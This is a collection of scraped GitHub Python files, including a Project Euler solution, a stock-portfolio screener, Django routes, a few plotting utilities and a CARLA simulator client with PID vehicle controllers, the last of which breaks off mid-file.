0\nfor (hand_1, hand_2) in zip(hands_player_1, hands_player_2):\n if get_hand_score(hand_1) > get_hand_score(hand_2):\n total_score_player_1 += 1\n elif get_hand_score(hand_1) == get_hand_score(hand_2):\n total_score_player_1 += tie_break(hand_1, hand_2)\n\nprint(total_score_player_1)\n\nend = time.time()\nprint(f\"Program runtime: {end - start} seconds\")\n","repo_name":"pzuehlke/Project-Euler-Solutions","sub_path":"problem_054.py","file_name":"problem_054.py","file_ext":"py","file_size_in_byte":4659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42326276846","text":"import numpy as np \nimport matplotlib.pyplot as plt \n\nx = np.arange(-10,10,0.001)\ny1 = 1./np.sqrt(1+np.abs(x))\ny2 = 1./(1+np.abs(x))\ny3 = 1./(1 + np.sqrt(np.abs(x)))\nfig = plt.figure()\nax1 = fig.add_subplot(1,1,1)\nax1.plot(x,y1,label=\"1/sqrt(1 + x)\")\nax1.plot(x,y2,label=\"1/(1 + x)\")\nax1.plot(x,y3,label=\"1/(1 + sqrt(x))\")\nax1.legend(loc=\"best\")\nplt.show()","repo_name":"juanmed/riseq_fast_uav","sub_path":"riseq_evaluation/libs/error_metrics/metrics_analysis.py","file_name":"metrics_analysis.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15843506756","text":"# -*- coding:utf-8 -*-\r\nfrom django.conf.urls import url\r\nfrom axf import views\r\n\r\nurlpatterns = [\r\n url(r'home/$', views.home),\r\n url(r'cart/$', views.cart),\r\n url(r'market/(\\w+)/(\\w+)/(\\w+)/$', views.market),\r\n url(r'mine/$', views.mine),\r\n url(r'detail/(\\w+)/(\\w+)/(\\w+)/$', views.detail),\r\n url(r'login/$', views.login),\r\n url(r'quit/$', views.quit),\r\n url(r'mine/address/$', views.address),\r\n url(r'address/addaddress/$', views.addAddress),\r\n url(r'^changecart/(\\d+)/$', views.changecart),\r\n url(r'^changecart2/$', views.changecart2),\r\n url(r'^order/$', views.order),\r\n\r\n]\r\n","repo_name":"Runbacktoo/python-ubuntu","sub_path":"project/axf/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16130155763","text":"import pandas as pd\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nfrom openpyxl import load_workbook\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport math\nfrom winreg import *\n\n\n\n\n\nwith OpenKey(HKEY_CURRENT_USER, 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders') as key:\n Downloads = QueryValueEx(key, '{374DE290-123F-4565-9164-39C4925E467B}')[0]\n\nif os.path.exists(Downloads+\"\\constituents_csv.csv\"):\n os.remove(Downloads+\"\\constituents_csv.csv\")\nelse:\n print(\"The file does not exist\")\n\nfrom webdriver_manager.chrome import ChromeDriverManager\n\ndriver = webdriver.Chrome(ChromeDriverManager().install())\ndriver.get(\"https://datahub.io/core/s-and-p-500-companies#resource-constituents\")\n\nelement = driver.find_element_by_link_text(\"csv (19kB)\")\nelement.click();\n\nDownload= Downloads + '\\constituents_csv.csv'\n\n\n\n\n\nSPdata=pd.pandas.read_csv(Download)\n\n\n\n\n\nimport yfinance as yf\nprint('Completed :')\nfor x in range(504):\n ticker = SPdata[\"Symbol\"].iloc[x]\n \n if \".\" in ticker:\n print(ticker + \" not counted\")\n else:\n def yfinancetut(tickersymbol):\n tickerdata = yf.Ticker(tickersymbol)\n tickerinfo = tickerdata.info\n hist = tickerdata.history(period=\"1Y\")\n\n\n beta_info = tickerinfo['beta']\n \n if 'priceToBook' in tickerinfo:\n pricetobook_info= tickerinfo['priceToBook']\n SPdata.loc[SPdata.index[x], 'Price to Book'] = pricetobook_info\n else:\n SPdata.loc[SPdata.index[x], 'Price to Book'] = np.nan\n\n \n mean_info = hist['Close'].mean()\n standdev_info = hist['Close'].std(axis = 0, skipna = True)\n lastclose_info = hist['Close'].iloc[-1]\n zscore_info = ((lastclose_info - mean_info)/standdev_info)\n\n\n SPdata.loc[SPdata.index[x], 'Beta'] = beta_info\n \n SPdata.loc[SPdata.index[x], 'Z-Score'] = zscore_info\n print (x)\n yfinancetut(ticker)\n\n\n\n\nSPdata.to_csv ('updated_values.csv', index = False, header=True)\n\n\n\n\n\nUPdata=pd.pandas.read_csv('updated_values.csv')\n\n\n\n\n\nfor x in range(504):\n if -1 < UPdata[\"Beta\"].iloc[x] < 2.8:\n UPdata.loc[UPdata.index[x], 'refined_beta'] = UPdata[\"Beta\"].iloc[x]\n else:\n UPdata.loc[UPdata.index[x], 'refined_beta'] = np.nan\n\n\n\n\n\nfor x in range(504):\n UPdata.loc[UPdata.index[x], 'log_pb'] = math.log(UPdata[\"Price to Book\"].iloc[x], 10)\n \n if -1 < UPdata[\"log_pb\"].iloc[x] < 1.5:\n UPdata.loc[UPdata.index[x], 'refined_pb'] = UPdata[\"log_pb\"].iloc[x]\n else:\n UPdata.loc[UPdata.index[x], 'refined_pb'] = np.nan\n\n\n\n\n\nUPdata = UPdata.dropna(subset=['Beta', 'Price to Book', 'Z-Score'])\n\n\n\n\n\nstd_refbeta = UPdata['refined_beta'].std()\nmean_refbeta = UPdata['refined_beta'].mean()\nstd_refpb = UPdata['refined_pb'].std()\nmean_refpb = UPdata['refined_pb'].mean()\n\n\n\n\nfor x in range(len(UPdata.index)):\n UPdata.loc[UPdata.index[x], 'z-score_beta'] = (UPdata[\"Beta\"].iloc[x] - mean_refbeta)/std_refbeta\n UPdata.loc[UPdata.index[x], 'z-score_pb'] = (math.log(UPdata[\"Price to Book\"].iloc[x], 10) - mean_refpb)/std_refpb\n\n\n\n\n\nfor x in range(len(UPdata.index)):\n UPdata.loc[UPdata.index[x], 'sum z-score'] = (UPdata[\"z-score_beta\"].iloc[x] + UPdata[\"z-score_pb\"].iloc[x] +UPdata[\"Z-Score\"].iloc[x])\n\n\n\n\n\nUPdata.sort_values(by=['sum z-score'], inplace=True)\n\n\n\n\n\nsum_topten = 0\nfor x in range(9):\n sum_topten = UPdata[\"sum z-score\"].iloc[x] + sum_topten\n UPdata.loc[UPdata.index[x], 'position'] = \"Long\"\nweightage_eachtop = 0.5/sum_topten\n\n\n\n\n\nsum_bottomten = 0\nfor x in range(1,10):\n xmodi = x * (-1)\n sum_bottomten = UPdata[\"sum z-score\"].iloc[xmodi] + sum_bottomten\n UPdata.loc[UPdata.index[xmodi], 'position'] = \"Short\"\n \nweightage_eachbottom = 0.5/sum_bottomten\n\n\n\n\n\nfor x in range(9):\n UPdata.loc[UPdata.index[x], 'weightage %'] = UPdata[\"sum z-score\"].iloc[x] * weightage_eachtop\n UPdata.loc[UPdata.index[x], 'avg z-score'] = (UPdata['sum z-score'].iloc[x])/3\n\n\n\n\n\nfor x in range(1,10):\n xmodi = x * (-1) \n UPdata.loc[UPdata.index[xmodi], 'weightage %'] = UPdata[\"sum z-score\"].iloc[xmodi] * weightage_eachbottom\n UPdata.loc[UPdata.index[xmodi], 'avg z-score'] = (UPdata['sum z-score'].iloc[xmodi])/3\n\n\n\n\n\nUPdata = UPdata.dropna(subset=['weightage %'])\n\n\n\n\n\nUPdata = UPdata.drop(['Beta', 'Price to Book', 'Z-Score','refined_beta', 'refined_pb', 'log_pb','z-score_beta', 'z-score_pb', 'sum z-score'], axis=1)\n\n\n\n\ndef color_negative_red(value):\n if value == 'Short':\n color = 'red'\n\n else:\n color = 'green'\n \n \n return 'color: %s' % color\n\n(UPdata.style\n .applymap(color_negative_red, subset=['position'])\n .format({'weightage %': \"{:.2%}\"}))\n\n\n\n\nUPdata.to_csv ('dollar nuetral portfolio.csv', index = False, header=True)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"rontik2002/Dollar_Neutral_Portfolio","sub_path":"Dollar Neutral Portfolio.py","file_name":"Dollar Neutral Portfolio.py","file_ext":"py","file_size_in_byte":4975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21414765751","text":"import pickle\r\nimport subprocess\r\nimport os\r\n\r\n# out_dir = \"/afs/inf.ed.ac.uk/group/msc-projects/s2096077/vm_eng_wavs\"\r\n# lang = \"eng\"\r\n\r\nout_dir = \"/afs/inf.ed.ac.uk/group/msc-projects/s2096077/vm_ger_wavs\"\r\nlang = \"ger\"\r\n\r\nwith open('sentence_id2recording_{}_new.pickle'.format(lang), 'rb') as handle:\r\n sentence_id2recording = pickle.load(handle)\r\n\r\nfor sentence_id, path_to_wav_file in list(sentence_id2recording.items()):\r\n subprocess.run('''\r\n # This will take a lot of memory (6GB for 25000 sph files)\r\n cp {} {}'''.format(path_to_wav_file, os.path.join(out_dir, sentence_id + \".wav\")),\r\n shell=True, check=True,\r\n executable='/bin/bash')\r\n","repo_name":"machnicole/prosody_nlp","sub_path":"code/feature_extraction/create_wav_dir.py","file_name":"create_wav_dir.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"24002456906","text":"from collections import Counter\nimport numpy as np\nimport plotly.graph_objects as go\nfrom plotly.subplots import make_subplots\n\n\ndef plot_viterbi_path_binary(\n viterbi: np.array, backpointer: list, sentence: str, tags: str\n) -> None:\n \"\"\"\n Shows the viterbi matrix result, highlighting the values that obtained the maximum probability at a given\n time step.\n\n Parameters\n ----------\n viterbi: viterbi algorithm matrix result. First element obtained after calling fuction: viterbi_logprobs\n backpointer: viterbi algorithm backpointer result. Second element obtained after calling fuction: viterbi_logprobs\n sentence: sentence which we have computed the probabilities against\n tags: set of tags used in the algorithm\n\n \"\"\"\n colors = viterbi.copy()\n\n for i in range(len(backpointer)):\n argmax_row = backpointer[i]\n colors[argmax_row, i] += 10000\n\n fig = go.Figure(\n data=go.Heatmap(\n z=colors,\n x=[word for word in sentence.split(\" \")],\n y=[tag for tag in tags],\n colorscale=\"Thermal\",\n text=viterbi,\n texttemplate=\"%{text}\",\n textfont={\"size\": 20},\n showscale=False,\n )\n )\n fig.show(legend=False)\n\n\ndef plot_viterbi_matrix(viterbi: np.array, sentence: str, tags: str) -> None:\n \"\"\"\n Shows the viterbi matrix result, painting the probabilities overall\n\n Parameters\n ----------\n viterbi: viterbi algorithm matrix result. First element obtained after calling fuction: viterbi_logprobs\n sentence: sentence which we have computed the probabilities against\n tags: set of tags used in the algorithm\n\n \"\"\"\n fig = go.Figure(\n data=go.Heatmap(\n z=viterbi,\n x=[word for word in sentence.split(\" \")],\n y=[tag for tag in tags],\n colorscale=\"Thermal\",\n )\n )\n fig.show(legend=False)\n\n\ndef plot_frequency_of_(\n feature: str, feature_counts_train: Counter, feature_counts_test: Counter, top=50\n):\n most_common_counts_train = feature_counts_train.most_common(top)\n x_train = [word for word, _ in most_common_counts_train]\n y_train = [count for _, count in most_common_counts_train]\n\n most_common_counts_test = feature_counts_test.most_common(top)\n x_test = [word for word, _ in most_common_counts_test]\n y_test = [count for _, count in most_common_counts_test]\n\n fig = make_subplots(rows=1, cols=2, subplot_titles=[\"Train data\", \"Test data\"])\n fig.add_trace(go.Bar(x=x_train, y=y_train), row=1, col=1)\n fig.add_trace(go.Bar(x=x_test, y=y_test), row=1, col=2)\n\n fig.update_xaxes(title_text=f\"{feature.title()}\", row=1, col=1)\n fig.update_yaxes(title_text=\"Ocurrences\", row=1, col=1)\n fig.update_xaxes(title_text=f\"{feature.title()}\", row=1, col=2)\n fig.update_yaxes(title_text=\"Ocurrences\", row=1, col=2)\n\n fig.update_layout(showlegend=False)\n fig.show()\n\n\ndef compare_size_and_time(datasets: dict, timings: list[int], title=str):\n fig = make_subplots(rows=1, cols=2)\n fig.add_trace(\n go.Scatter(\n x=[key for key in datasets.keys()],\n y=[len(value) for value in datasets.values()],\n name=\"Size\",\n ),\n row=1,\n col=1,\n )\n fig.add_trace(\n go.Scatter(x=[key for key in datasets.keys()], y=timings, name=\"Time\"),\n row=1,\n col=2,\n )\n\n fig.update_xaxes(title_text=f\"Dataset Name\", row=1, col=1)\n fig.update_yaxes(title_text=\"Number of rows\", row=1, col=1)\n\n fig.update_xaxes(title_text=f\"Dataset Name\", row=1, col=2)\n fig.update_yaxes(title_text=\"Avg Time of Execution (s)\", row=1, col=2)\n\n if title:\n fig.update_layout(title_text=title)\n\n fig.show()\n","repo_name":"ramcarreno/pos-tagger","sub_path":"src/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":3748,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"43503595767","text":"from __future__ import print_function\n\nimport argparse\nimport collections\nimport datetime\nimport glob\nimport logging\nimport math\nimport os\nimport random\nimport re\nimport sys\nimport weakref\nfrom collections import deque\nimport numpy as np\nimport xlwt\nimport time\ntry:\n import pygame\n from pygame.locals import KMOD_CTRL\n from pygame.locals import KMOD_SHIFT\n from pygame.locals import K_0\n from pygame.locals import K_9\n from pygame.locals import K_BACKQUOTE\n from pygame.locals import K_BACKSPACE\n from pygame.locals import K_COMMA\n from pygame.locals import K_DOWN\n from pygame.locals import K_ESCAPE\n from pygame.locals import K_F1\n from pygame.locals import K_LEFT\n from pygame.locals import K_PERIOD\n from pygame.locals import K_RIGHT\n from pygame.locals import K_SLASH\n from pygame.locals import K_SPACE\n from pygame.locals import K_TAB\n from pygame.locals import K_UP\n from pygame.locals import K_a\n from pygame.locals import K_c\n from pygame.locals import K_d\n from pygame.locals import K_h\n from pygame.locals import K_m\n from pygame.locals import K_p\n from pygame.locals import K_q\n from pygame.locals import K_r\n from pygame.locals import K_s\n from pygame.locals import K_w\nexcept ImportError:\n raise RuntimeError('cannot import pygame, make sure pygame package is installed')\n\ntry:\n import numpy as np\nexcept ImportError:\n raise RuntimeError(\n 'cannot import numpy, make sure numpy package is installed')\n\n# ==============================================================================\n# -- find carla module ---------------------------------------------------------\n# ==============================================================================\ntry:\n sys.path.append(glob.glob('**/carla-*%d.%d-%s.egg' % (\n sys.version_info.major,\n sys.version_info.minor,\n 'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])\nexcept IndexError:\n pass\n\nimport carla\nfrom carla import ColorConverter as cc\nfrom agents.navigation.roaming_agent import *\nfrom agents.navigation.basic_agent import *\nfrom agents.tools.misc import distance_vehicle, get_speed\nfrom agents.tools.misc import is_within_distance_ahead, compute_magnitude_angle\n\n\n\n# ==============================================================================\n# -- Global functions ----------------------------------------------------------\n# ==============================================================================\ndef find_weather_presets():\n rgx = re.compile('.+?(?:(?<=[a-z])(?=[A-Z])|(?<=[A-Z])(?=[A-Z][a-z])|$)')\n name = lambda x: ' '.join(m.group(0) for m in rgx.finditer(x))\n presets = [x for x in dir(carla.WeatherParameters) if re.match('[A-Z].+', x)]\n return [(getattr(carla.WeatherParameters, x), name(x)) for x in presets]\n\n\ndef get_actor_display_name(actor, truncate=250):\n name = ' '.join(actor.type_id.replace('_', '.').title().split('.')[1:])\n return (name[:truncate-1] + u'\\u2026') if len(name) > truncate else name\n\n\n# ==============================================================================\n# -- World ---------------------------------------------------------------\n# ==============================================================================\n\nclass World(object):\n def __init__(self, carla_world, hud):\n self.world = carla_world\n self.hud = hud\n self.vehicle = None\n self.collision_sensor = None\n self.lane_invasion_sensor = None\n self.camera_manager = None\n self._weather_presets = find_weather_presets()\n self._weather_index = 0\n self.restart()\n self.world.on_tick(hud.on_world_tick)\n\n def restart(self):\n # Keep same camera config if the camera manager exists.\n cam_index = self.camera_manager._index if self.camera_manager is not None else 0\n cam_pos_index = self.camera_manager._transform_index if self.camera_manager is not None else 0\n\n blueprint = random.choice(self.world.get_blueprint_library().filter('vehicle.tesla.*'))\n # blueprint = random.choice(self.world.get_blueprint_library().filter('vehicle.ford.mustang'))\n # blueprint = random.choice(self.world.get_blueprint_library().filter('vehicle.bmw.grandtourer')) \n blueprint.set_attribute('role_name', 'hero')\n blueprint.set_attribute('color', '120,0,0')\n \n # if blueprint.has_attribute('color'):\n # color = random.choice(blueprint.get_attribute('color').recommended_values)\n # blueprint.set_attribute('color', color)\n\n # Spawn the vehicle.\n if self.vehicle is not None:\n spawn_point = self.vehicle.get_transform()\n spawn_point.location.z += 2.0\n spawn_point.rotation.roll = 0.0\n spawn_point.rotation.pitch = 0.0\n self.destroy()\n\n spawn_points = self.world.get_map().get_spawn_points()\n spawn_point = spawn_points[1]\n self.vehicle = self.world.spawn_actor(blueprint, spawn_point)\n\n while self.vehicle is None:\n # spawn_points = self.world.get_map().get_spawn_points()\n # spawn_point = spawn_points[1]\n # self.vehicle = self.world.spawn_actor(blueprint, spawn_point)\n \n # support_actor = random.choice(self.world.get_actors().filter(\"*vehicle*\"))\n # support_actor_point = support_actor.get_transform()\n # spawn_point = support_actor_point\n # spawn_point.location.y = spawn_point.location.y - 10.0\n # spawn_point = carla.Transform(carla.Location(x=373.40, y=-8.7, z=0.40), carla.Rotation(pitch=0, yaw=-181.00004, roll=0))\n # Tesla spawn parameter\n spawn_point = carla.Transform(carla.Location(x=-2.10 ,y=-150, z=0.80), carla.Rotation(pitch=0, yaw=90.0, roll=0))\n\n\n # spawn_point.rotation.roll = 90.0\n # spawn_point.rotation.pitch = 90.0\n \n # spawn_point = carla.Transform (carla.Location(x=232,y=160,z=2),carla.Rotation(roll=0,pitch=0,yaw=180))\n self.vehicle = self.world.try_spawn_actor(blueprint, spawn_point)\n \n # Set up the sensors.\n self.collision_sensor = CollisionSensor(self.vehicle, self.hud)\n self.lane_invasion_sensor = LaneInvasionSensor(self.vehicle, self.hud)\n self.camera_manager = CameraManager(self.vehicle, self.hud)\n self.camera_manager._transform_index = cam_pos_index\n self.camera_manager.set_sensor(cam_index, notify=False)\n actor_type = get_actor_display_name(self.vehicle)\n self.hud.notification(actor_type)\n \n # def record(self,vehicle):\n # global counter\n # name = str(get_actor_display_name(vehicle, truncate=20))\n # velocity = vehicle.get_velocity()\n # speed = 3.6 * math.sqrt(velocity.x**2 + velocity.y**2 + velocity.z**2)\n # wb = xlwt.Workbook()\n # sheet1 = wb.add_sheet(name)\n # row = counter\n # sheet1.write(row,0,'jajaja')\n # wb.save('record_2.xlsx')\n\n\n def next_weather(self, reverse=False):\n self._weather_index += -1 if reverse else 1\n self._weather_index %= len(self._weather_presets)\n preset = self._weather_presets[self._weather_index]\n self.hud.notification('Weather: %s' % preset[1])\n self.vehicle.get_world().set_weather(preset[0])\n\n def tick(self, clock):\n self.hud.tick(self, clock)\n\n def render(self, display):\n self.camera_manager.render(display)\n self.hud.render(display)\n\n def destroy(self):\n actors = [\n self.camera_manager.sensor,\n self.collision_sensor.sensor,\n self.lane_invasion_sensor.sensor,\n self.vehicle]\n for actor in actors:\n if actor is not None:\n actor.destroy()\n\n\n# ==============================================================================\n# -- KeyboardControl -----------------------------------------------------------\n# ==============================================================================\n\nclass KeyboardControl(object):\n def __init__(self, world, start_in_autopilot):\n self._autopilot_enabled = start_in_autopilot\n self._control = carla.VehicleControl()\n self._steer_cache = 0.0\n world.vehicle.set_autopilot(self._autopilot_enabled)\n world.hud.notification(\"Press 'H' or '?' for help.\", seconds=4.0)\n\n def parse_events(self, world, clock):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n return True\n elif event.type == pygame.KEYUP:\n if self._is_quit_shortcut(event.key):\n return True\n elif event.key == K_BACKSPACE:\n world.restart()\n elif event.key == K_F1:\n world.hud.toggle_info()\n elif event.key == K_h or (event.key == K_SLASH and pygame.key.get_mods() & KMOD_SHIFT):\n world.hud.help.toggle()\n elif event.key == K_TAB:\n world.camera_manager.toggle_camera()\n elif event.key == K_c and pygame.key.get_mods() & KMOD_SHIFT:\n world.next_weather(reverse=True)\n elif event.key == K_c:\n world.next_weather()\n elif event.key == K_BACKQUOTE:\n world.camera_manager.next_sensor()\n elif event.key > K_0 and event.key <= K_9:\n world.camera_manager.set_sensor(event.key - 1 - K_0)\n elif event.key == K_r:\n world.camera_manager.toggle_recording()\n elif event.key == K_q:\n self._control.gear = 1 if self._control.reverse else -1\n elif event.key == K_m:\n self._control.manual_gear_shift = not self._control.manual_gear_shift\n self._control.gear = world.vehicle.get_vehicle_control().gear\n world.hud.notification(\n '%s Transmission' % ('Manual' if self._control.manual_gear_shift else 'Automatic'))\n elif self._control.manual_gear_shift and event.key == K_COMMA:\n self._control.gear = max(-1, self._control.gear - 1)\n elif self._control.manual_gear_shift and event.key == K_PERIOD:\n self._control.gear = self._control.gear + 1\n elif event.key == K_p:\n self._autopilot_enabled = not self._autopilot_enabled\n world.vehicle.set_autopilot(self._autopilot_enabled)\n world.hud.notification('Autopilot %s' % ('On' if self._autopilot_enabled else 'Off'))\n if not self._autopilot_enabled:\n self._parse_keys(pygame.key.get_pressed(), clock.get_time())\n self._control.reverse = self._control.gear < 0\n\n def _parse_keys(self, keys, milliseconds):\n self._control.throttle = 1.0 if keys[K_UP] or keys[K_w] else 0.0\n steer_increment = 5e-4 * milliseconds\n if keys[K_LEFT] or keys[K_a]:\n self._steer_cache -= steer_increment\n elif keys[K_RIGHT] or keys[K_d]:\n self._steer_cache += steer_increment\n else:\n self._steer_cache = 0.0\n self._steer_cache = min(0.7, max(-0.7, self._steer_cache))\n self._control.steer = round(self._steer_cache, 1)\n self._control.brake = 1.0 if keys[K_DOWN] or keys[K_s] else 0.0\n self._control.hand_brake = keys[K_SPACE]\n\n @staticmethod\n def _is_quit_shortcut(key):\n return (key == K_ESCAPE) or (key == K_q and pygame.key.get_mods() & KMOD_CTRL)\n\n\n# ==============================================================================\n# -- PIDControl -----------------------------------------------------------\n# ==============================================================================\n\nclass VehiclePIDController():\n \"\"\"\n VehiclePIDController is the combination of two PID controllers (lateral and longitudinal) to perform the\n low level control a vehicle from client side\n \"\"\"\n\n def __init__(self, vehicle,\n args_lateral={'K_P': 1.12, 'K_D': 0.005, 'K_I': 1.17},\n args_longitudinal={'K_P': 1.0, 'K_D':0 , 'K_I': 1}):\n \"\"\"\n :param vehicle: actor to apply to local planner logic onto\n :param args_lateral: dictionary of arguments to set the lateral PID controller using the following semantics:\n K_P -- Proportional term\n K_D -- Differential term\n K_I -- Integral term\n :param args_longitudinal: dictionary of arguments to set the longitudinal PID controller using the following\n semantics:\n K_P -- Proportional term\n K_D -- Differential term\n K_I -- Integral term\n \"\"\"\n self._vehicle = vehicle\n self._world = self._vehicle.get_world()\n self._lon_controller = PIDLongitudinalController(\n self._vehicle, **args_longitudinal)\n self._lat_controller = PIDLateralController(\n self._vehicle, **args_lateral)\n\n def run_step(self):\n \"\"\"\n Execute one step of control invoking both lateral and longitudinal PID controllers to reach a target waypoint\n at a given target_speed.\n\n :param target_speed: desired vehicle speed\n :param waypoint: target location encoded as a waypoint\n :return: distance (in meters) to the waypoint\n \"\"\"\n throttle = self._lon_controller.run_step()\n steering = self._lat_controller.run_step()\n\n control = carla.VehicleControl()\n control.steer = steering\n control.throttle = throttle\n control.brake = 0.0\n control.hand_brake = False\n control.manual_gear_shift = False\n\n return control\n\n\nclass PIDLongitudinalController():\n \"\"\"\n PIDLongitudinalController implements longitudinal control using a PID.\n \"\"\"\n\n def __init__(self, vehicle, K_P=1.0, K_D=0.0, K_I=0.0, dt=0.03):\n \"\"\"\n :param vehicle: actor to apply to local planner logic onto\n :param K_P: Proportional term\n :param K_D: Differential term\n :param K_I: Integral term\n :param dt: time differential in seconds\n \"\"\"\n self._vehicle = vehicle\n self._world = self._vehicle.get_world()\n self._K_P = K_P\n self._K_D = K_D\n self._K_I = K_I\n self._dt = dt\n self._e_buffer = deque(maxlen=30)\n\n\n def speed_setting(self):\n global target_vehicle\n target_vehicle = None\n ego_vehicle = self._vehicle\n ego_vehicle_location = self._vehicle.get_location()\n # ego_vehicle_waypoint = self._world.get_map().get_waypoint(ego_vehicle_location)\n vehicle_list = self._world.get_actors().filter(\"*vehicle*\")\n\n car_number = len(vehicle_list)\n \n if car_number > 1:\n # if target_vehicle is None: \n # for index in vehicle_list:\n # if index.id != ego_vehicle.id:\n # target_vehicle = index\n # break\n # else:\n # pass\n # else: \n # target_vehicle_location = target_vehicle.get_location()\n # # target_vehicle_waypoint = self._world.get_map().get_waypoint(target_vehicle_location)\n # # if target_vehicle_waypoint.road_id == ego_vehicle_waypoint.road_id or\\\n # # target_vehicle_waypoint.lane_id == ego_vehicle_waypoint.lane_id:\n # offset = abs(ego_vehicle_location.y - target_vehicle_location.y)\n # if offset < 1.7:\n # return get_speed(target_vehicle) \n # else:\n # return 60\n # target_vehicle = vehicle_list[0]\n\n for index in vehicle_list:\n if index.id != ego_vehicle.id:\n target_vehicle = index\n break\n else:\n pass\n # target_vehicle_waypoint = self._world.get_map().get_waypoint(target_vehicle_location)\n # if target_vehicle_waypoint.road_id == ego_vehicle_waypoint.road_id or\\\n # target_vehicle_waypoint.lane_id == ego_vehicle_waypoint.lane_id:\n target_vehicle_location = target_vehicle.get_location()\n offset = abs(ego_vehicle_location.x - target_vehicle_location.x)\n if offset < 1.77:\n return get_speed(target_vehicle)\n else:\n return 20 \n \n else:\n return 20\n \n\n\n def run_step(self, debug=False):\n \"\"\"\n Execute one step of longitudinal control to reach a given target speed.\n\n :param target_speed: target speed in Km/h\n :return: throttle control in the range [0, 1]\n \"\"\"\n current_speed = get_speed(self._vehicle)\n\n if debug:\n print('Current speed = {}'.format(current_speed))\n\n return self._pid_control( current_speed)\n\n\n def _pid_control(self, current_speed):\n \"\"\"\n Estimate the throttle of the vehicle based on the PID equations\n\n :param target_speed: target speed in Km/h\n :param current_speed: current speed of the vehicle in Km/h\n :return: throttle control in the range [0, 1]\n \"\"\"\n target_speed = self.speed_setting()\n _e = (target_speed - current_speed)\n self._e_buffer.append(_e)\n\n if len(self._e_buffer) >= 2:\n _de = (self._e_buffer[-1] - self._e_buffer[-2]) / self._dt\n _ie = sum(self._e_buffer) * self._dt\n else:\n _de = 0.0\n _ie = 0.0\n\n return np.clip((self._K_P * _e) + (self._K_D * _de / self._dt) + (self._K_I * _ie * self._dt), 0.0, 1.0)\n\n\nclass PIDLateralController():\n \"\"\"\n PIDLateralController implements lateral control using a PID.\n \"\"\"\n\n def __init__(self, vehicle, K_P=1.0, K_D=0.0, K_I=0.0, dt=0.03):\n \"\"\"\n :param vehicle: actor to apply to local planner logic onto\n :param K_P: Proportional term\n :param K_D: Differential term\n :param K_I: Integral term\n :param dt: time differential in seconds\n \"\"\"\n self._vehicle = vehicle\n self._world = self._vehicle.get_world()\n self._K_P = K_P\n self._K_D = K_D\n self._K_I = K_I\n self._dt = dt\n self._e_buffer = deque(maxlen=10)\n\n def waypoint_setting(self):\n target_vehicle = None\n ego_vehicle = self._vehicle\n ego_vehicle_location = self._vehicle.get_location()\n # ego_vehicle_waypoint = self._world.get_map().get_waypoint(ego_vehicle_location)\n vehicle_list = self._world.get_actors().filter(\"*vehicle*\")\n\n car_number = len(vehicle_list)\n \n\n # if target_vehicle is None: \n # for index in vehicle_list:\n # if index.id != ego_vehicle.id:\n # target_vehicle = index\n # break\n # else:\n # pass\n # else: \n # target_vehicle_location = target_vehicle.get_location()\n # # target_vehicle_waypoint = self._world.get_map().get_waypoint(target_vehicle_location)\n # # if target_vehicle_waypoint.road_id == ego_vehicle_waypoint.road_id or\\\n # # target_vehicle_waypoint.lane_id == ego_vehicle_waypoint.lane_id:\n # offset = abs(ego_vehicle_location.y - target_vehicle_location.y)\n # if offset < 1.7:\n # return get_speed(target_vehicle) \n # else:\n # return 60\n # target_vehicle = vehicle_list[0]\n\n for index in vehicle_list:\n if index.id != ego_vehicle.id:\n target_vehicle = index\n break\n else:\n pass\n # target_vehicle_waypoint = self._world.get_map().get_waypoint(target_vehicle_location)\n # if target_vehicle_waypoint.road_id == ego_vehicle_waypoint.road_id or\\\n # target_vehicle_waypoint.lane_id == ego_vehicle_waypoint.lane_id:\n target_vehicle_location = target_vehicle.get_location()\n waypoint = self._world.get_map().get_waypoint(target_vehicle_location)\n \n return waypoint \n \n\n\n def run_step(self):\n \"\"\"\n Execute one step of lateral control to steer the vehicle towards a certain waypoin.\n\n :param waypoint: target waypoint\n :return: steering control in the range [-1, 1] where:\n -1 represent maximum steering to left\n +1 maximum steering to right\n \"\"\"\n return self._pid_control( self._vehicle.get_transform())\n\n def _pid_control(self, vehicle_transform):\n \"\"\"\n Estimate the steering angle of the vehicle based on the PID equations\n\n :param waypoint: target waypoint\n :param vehicle_transform: current transform of the vehicle\n :return: steering control in the range [-1, 1]\n \"\"\"\n # print (waypoint)\n waypoint = self.waypoint_setting()\n v_begin = vehicle_transform.location\n v_end = v_begin + carla.Location(x=math.cos(math.radians(vehicle_transform.rotation.yaw)),\n y=math.sin(math.radians(vehicle_transform.rotation.yaw)))\n\n v_vec = np.array([v_end.x - v_begin.x, v_end.y - v_begin.y, 0.0])\n w_vec = np.array([waypoint.transform.location.x -\n v_begin.x, waypoint.transform.location.y -\n v_begin.y, 0.0])\n _dot = math.acos(np.clip(np.dot(w_vec, v_vec) /\n (np.linalg.norm(w_vec) * np.linalg.norm(v_vec)), -1.0, 1.0))\n\n _cross = np.cross(v_vec, w_vec)\n if _cross[2] < 0:\n _dot *= -1.0\n\n self._e_buffer.append(_dot)\n if len(self._e_buffer) >= 2:\n _de = (self._e_buffer[-1] - self._e_buffer[-2]) / self._dt\n _ie = sum(self._e_buffer) * self._dt\n else:\n _de = 0.0\n _ie = 0.0\n\n return np.clip((self._K_P * _dot) + (self._K_D * _de /\n self._dt) + (self._K_I * _ie * self._dt), -1.0, 1.0)\n\n# 